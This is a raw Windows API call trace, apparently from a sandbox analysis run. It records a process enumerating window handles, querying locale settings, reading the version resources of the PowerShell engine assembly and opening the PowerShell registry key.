	[0065.240] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.240] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.240] GetWindowThreadProcessId (in: hWnd=0x50228, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x5e0
	[0065.240] GetWindowThreadProcessId (in: hWnd=0x5021c, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x90
	[0065.240] GetWindowThreadProcessId (in: hWnd=0xa00a4, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.240] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x914
	[0065.240] GetWindowThreadProcessId (in: hWnd=0x400d6, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.241] GetWindowThreadProcessId (in: hWnd=0x400fa, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.241] GetWindowThreadProcessId (in: hWnd=0x500d2, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.241] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.241] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.241] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.241] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.241] GetWindowThreadProcessId (in: hWnd=0x4021a, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x840
	[0065.241] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x844
	[0065.241] GetWindowThreadProcessId (in: hWnd=0x401f6, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x46c
	[0065.241] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0xb40
	[0065.241] GetWindowThreadProcessId (in: hWnd=0x40116, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x914
	[0065.241] GetWindowThreadProcessId (in: hWnd=0x700d4, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x988
	[0065.242] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x914
	[0065.242] GetWindowThreadProcessId (in: hWnd=0x201b8, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x950
	[0065.242] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x914
	[0065.242] GetWindowThreadProcessId (in: hWnd=0x201a8, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x914
	[0065.242] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x868
	[0065.242] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x850
	[0065.242] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x830
	[0065.242] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x814
	[0065.242] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x744
	[0065.242] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x2a8
	[0065.242] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x534
	[0065.243] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x5e4
	[0065.243] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x5c4
	[0065.243] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x58c
	[0065.243] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x238
	[0065.243] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x584
	[0065.243] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x7e8
	[0065.243] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x678
	[0065.243] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x35c
	[0065.243] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x51c
	[0065.243] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x360
	[0065.243] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x274
	[0065.243] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x588
	[0065.244] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0xc8
	[0065.244] GetWindowThreadProcessId (in: hWnd=0xa010a, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x21c
	[0065.244] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x5ec
	[0065.244] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x334
	[0065.244] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x664
	[0065.244] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x334
	[0065.244] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x664
	[0065.244] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x334
	[0065.244] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x5ec
	[0065.244] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x5ec
	[0065.244] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x550
	[0065.245] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x7a0
	[0065.245] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x594
	[0065.245] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x564
	[0065.245] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x45c
	[0065.245] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x548
	[0065.245] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.245] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x518
	[0065.245] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.245] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.245] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.245] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x508
	[0065.245] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.246] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4ec
	[0065.246] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.246] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x45c
	[0065.246] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x45c
	[0065.246] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x44c
	[0065.246] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x7ec
	[0065.246] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x45c
	[0065.246] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x324
	[0065.246] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.246] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.246] GetWindowThreadProcessId (in: hWnd=0x701f2, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x854
	[0065.246] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x914
	[0065.247] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x914
	[0065.247] GetWindowThreadProcessId (in: hWnd=0x501f4, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x140
	[0065.247] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x55c
	[0065.247] GetWindowThreadProcessId (in: hWnd=0x30222, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x34c
	[0065.247] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0xb40
	[0065.247] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x988
	[0065.247] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x868
	[0065.247] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x850
	[0065.247] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x830
	[0065.247] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x814
	[0065.247] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x744
	[0065.248] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x2a8
	[0065.248] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x534
	[0065.248] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x5e4
	[0065.248] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x5c4
	[0065.248] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x58c
	[0065.248] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x238
	[0065.248] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x584
	[0065.248] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x7e8
	[0065.248] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x678
	[0065.248] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x35c
	[0065.248] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x51c
	[0065.249] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x360
	[0065.249] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x274
	[0065.249] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x588
	[0065.249] GetWindowThreadProcessId (in: hWnd=0x80150, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0xc8
	[0065.249] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x21c
	[0065.249] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x664
	[0065.249] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x334
	[0065.249] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x5ec
	[0065.249] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x550
	[0065.249] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x7a0
	[0065.249] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x594
	[0065.249] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x45c
	[0065.250] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x508
	[0065.250] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4ec
	[0065.250] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x45c
	[0065.250] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x7ec
	[0065.294] WerSetFlags () returned 0x0
	[0065.487] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0065.487] CoTaskMemFree (pv=0x0) 
	[0065.488] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x27dc88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x27dc80 | out: pulNumLanguages=0x27dc88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x27dc80) returned 1
	[0065.488] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x27dc88, pwszLanguagesBuffer=0x2cdd6f0, pcchLanguagesBuffer=0x27dc80 | out: pulNumLanguages=0x27dc88, pwszLanguagesBuffer=0x2cdd6f0, pcchLanguagesBuffer=0x27dc80) returned 1
	[0065.492] CoTaskMemAlloc (cb=0x24) returned 0x5579f0
	[0065.492] GetUserDefaultLocaleName (in: lpLocaleName=0x5579f0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0065.493] CoTaskMemFree (pv=0x5579f0) 
	[0065.514] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0065.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.514] CoTaskMemFree (pv=0x506ba0) 
	[0065.516] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0065.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.516] CoTaskMemFree (pv=0x506ba0) 
	[0065.548] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0065.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.548] CoTaskMemFree (pv=0x506ba0) 
	[0065.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.562] SetErrorMode (uMode=0x1) returned 0x1
	[0065.562] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x27d900 | out: lpFileInformation=0x27d900*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0065.562] SetErrorMode (uMode=0x1) returned 0x1
	[0065.562] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x27db70 | out: lpdwHandle=0x27db70) returned 0x94c
	[0065.569] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ce0f80 | out: lpData=0x2ce0f80) returned 1
	[0065.570] VerQueryValueW (in: pBlock=0x2ce0f80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x27dae8, puLen=0x27dae0 | out: lplpBuffer=0x27dae8*=0x2ce101c, puLen=0x27dae0) returned 1
	[0065.570] VerQueryValueW (in: pBlock=0x2ce0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x27da58, puLen=0x27da50 | out: lplpBuffer=0x27da58*=0x2ce10f8, puLen=0x27da50) returned 1
	[0065.570] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0065.570] CoTaskMemAlloc (cb=0x2e) returned 0x551c80
	[0065.570] lstrcpyW (in: lpString1=0x551c80, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0065.570] CoTaskMemFree (pv=0x551c80) 
	[0065.570] VerQueryValueW (in: pBlock=0x2ce0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x27da58, puLen=0x27da50 | out: lplpBuffer=0x27da58*=0x2ce114c, puLen=0x27da50) returned 1
	[0065.570] lstrlenW (lpString="System.Management.Automation") returned 28
	[0065.570] CoTaskMemAlloc (cb=0x3c) returned 0x55ad50
	[0065.570] lstrcpyW (in: lpString1=0x55ad50, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0065.570] CoTaskMemFree (pv=0x55ad50) 
	[0065.570] VerQueryValueW (in: pBlock=0x2ce0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x27da58, puLen=0x27da50 | out: lplpBuffer=0x27da58*=0x2ce11a8, puLen=0x27da50) returned 1
	[0065.570] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0065.570] CoTaskMemAlloc (cb=0x20) returned 0x557a50
	[0065.570] lstrcpyW (in: lpString1=0x557a50, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0065.570] CoTaskMemFree (pv=0x557a50) 
	[0065.570] VerQueryValueW (in: pBlock=0x2ce0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x27da58, puLen=0x27da50 | out: lplpBuffer=0x27da58*=0x2ce11e8, puLen=0x27da50) returned 1
	[0065.570] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0065.571] CoTaskMemAlloc (cb=0x44) returned 0x55ad50
	[0065.571] lstrcpyW (in: lpString1=0x55ad50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0065.571] CoTaskMemFree (pv=0x55ad50) 
	[0065.571] VerQueryValueW (in: pBlock=0x2ce0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x27da58, puLen=0x27da50 | out: lplpBuffer=0x27da58*=0x2ce1250, puLen=0x27da50) returned 1
	[0065.571] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0065.571] CoTaskMemAlloc (cb=0x76) returned 0x4edf00
	[0065.571] lstrcpyW (in: lpString1=0x4edf00, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0065.571] CoTaskMemFree (pv=0x4edf00) 
	[0065.571] VerQueryValueW (in: pBlock=0x2ce0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x27da58, puLen=0x27da50 | out: lplpBuffer=0x27da58*=0x2ce12ec, puLen=0x27da50) returned 1
	[0065.571] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0065.571] CoTaskMemAlloc (cb=0x44) returned 0x55ad50
	[0065.571] lstrcpyW (in: lpString1=0x55ad50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0065.571] CoTaskMemFree (pv=0x55ad50) 
	[0065.571] VerQueryValueW (in: pBlock=0x2ce0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x27da58, puLen=0x27da50 | out: lplpBuffer=0x27da58*=0x2ce1350, puLen=0x27da50) returned 1
	[0065.571] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0065.571] CoTaskMemAlloc (cb=0x58) returned 0x4a4560
	[0065.571] lstrcpyW (in: lpString1=0x4a4560, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0065.571] CoTaskMemFree (pv=0x4a4560) 
	[0065.571] VerQueryValueW (in: pBlock=0x2ce0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x27da58, puLen=0x27da50 | out: lplpBuffer=0x27da58*=0x2ce13cc, puLen=0x27da50) returned 1
	[0065.571] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0065.571] CoTaskMemAlloc (cb=0x20) returned 0x557a50
	[0065.571] lstrcpyW (in: lpString1=0x557a50, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0065.571] CoTaskMemFree (pv=0x557a50) 
	[0065.571] VerQueryValueW (in: pBlock=0x2ce0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x27da58, puLen=0x27da50 | out: lplpBuffer=0x27da58*=0x2ce1074, puLen=0x27da50) returned 1
	[0065.571] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0065.571] CoTaskMemAlloc (cb=0x66) returned 0x5559e0
	[0065.571] lstrcpyW (in: lpString1=0x5559e0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0065.571] CoTaskMemFree (pv=0x5559e0) 
	[0065.571] VerQueryValueW (in: pBlock=0x2ce0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x27da58, puLen=0x27da50 | out: lplpBuffer=0x27da58*=0x0, puLen=0x27da50) returned 0
	[0065.571] VerQueryValueW (in: pBlock=0x2ce0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x27da58, puLen=0x27da50 | out: lplpBuffer=0x27da58*=0x0, puLen=0x27da50) returned 0
	[0065.571] VerQueryValueW (in: pBlock=0x2ce0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x27da58, puLen=0x27da50 | out: lplpBuffer=0x27da58*=0x0, puLen=0x27da50) returned 0
	[0065.571] VerQueryValueW (in: pBlock=0x2ce0f80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x27da28, puLen=0x27da20 | out: lplpBuffer=0x27da28*=0x2ce101c, puLen=0x27da20) returned 1
	[0065.572] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0065.572] VerLanguageNameW (in: wLang=0x0, szLang=0x4e89c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0065.572] CoTaskMemFree (pv=0x4e89c0) 
	[0065.572] VerQueryValueW (in: pBlock=0x2ce0f80, lpSubBlock="\\", lplpBuffer=0x27da78, puLen=0x27da70 | out: lplpBuffer=0x27da78*=0x2ce0fa8, puLen=0x27da70) returned 1
	[0065.579] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0065.579] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.579] CoTaskMemFree (pv=0x506ba0) 
	[0065.644] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0065.644] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.644] CoTaskMemFree (pv=0x506ba0) 
	[0065.690] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d948 | out: phkResult=0x27d948*=0x308) returned 0x0
	[0065.691] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d938 | out: phkResult=0x27d938*=0x30c) returned 0x0
